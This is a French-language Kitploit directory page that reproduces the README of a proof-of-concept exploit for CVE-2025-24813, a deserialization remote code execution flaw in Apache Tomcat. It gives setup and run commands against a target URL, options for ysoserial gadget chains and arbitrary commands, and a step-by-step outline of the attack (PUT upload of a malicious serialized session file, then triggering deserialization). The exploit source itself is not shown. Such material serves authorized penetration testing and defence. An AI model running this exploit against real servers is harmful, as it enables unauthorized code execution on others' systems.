Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-24813-poc | Kitploit
Outils/GitHubGitHub/yaleman/cve-2025-24813-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges UtilesArchived
GitHubyaleman/cve-2025-24813-poc

cve-2025-24813-poc

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-24813 Apache Tomcat RCE — PoC d'exploitation

Ce dépôt contient un exploit de type preuve de concept (PoC) pour CVE-2025-24813, une vulnérabilité de désérialisation Java dans Apache Tomcat.

Basé sur absholi7ly/POC-CVE-2025-24813/.

Prérequis

  • Docker

Installation

  1. Installez les dépendances :

    root@kitploit:~
    uv venv
    source .venv/bin/activate
    uv sync
    
  2. Téléchargez ysoserial :

    root@kitploit:~
    ./download.sh
    

Utilisation

Utilisation de Docker (recommandé)

Construisez et exécutez l'exploit dans un conteneur :

root@kitploit:~
docker build -t cve-2025-24813-poc:latest .
docker run --rm -it --mount "type=bind,src=$(pwd),target=/app" cve-2025-24813-poc:latest
python main.py <target>

Exécution directe

Exécutez l'exploit directement :

root@kitploit:~
python main.py <target_url> [options]

Options

  • --command : Commande à exécuter (par défaut : calc.exe)
  • --ysoserial : Chemin vers ysoserial.jar (par défaut : ./ysoserial-all.jar)
  • --gadget : Chaîne de gadgets ysoserial (par défaut : CommonsCollections6)
  • --payload_type : Type de charge utile - ysoserial ou java (par défaut : ysoserial)
  • --no-ssl-verify : Désactiver la vérification SSL

Exemples

root@kitploit:~
# Basic usage
python main.py http://target:8080

# Custom command
python main.py http://target:8080 --command "whoami"

# Using Java payload instead of ysoserial
python main.py http://target:8080 --payload_type java

Fonctionnement

  1. Vérifie si le servlet cible est accessible en écriture via des requêtes PUT
  2. Génère une charge utile Java sérialisée malveillante
  3. Téléverse la charge utile sous forme de fichier de session
  4. Déclenche la désérialisation en accédant à la session

Avertissement

Cet outil est destiné uniquement à des fins éducatives et à des tests autorisés. Ne l'utilisez pas contre des systèmes dont vous n'êtes pas propriétaire ou que vous n'avez pas l'autorisation explicite de tester.

Références

  • https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24813
  • https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-03-14-Testing-CVE-2025-24813.md
Télécharger l’outil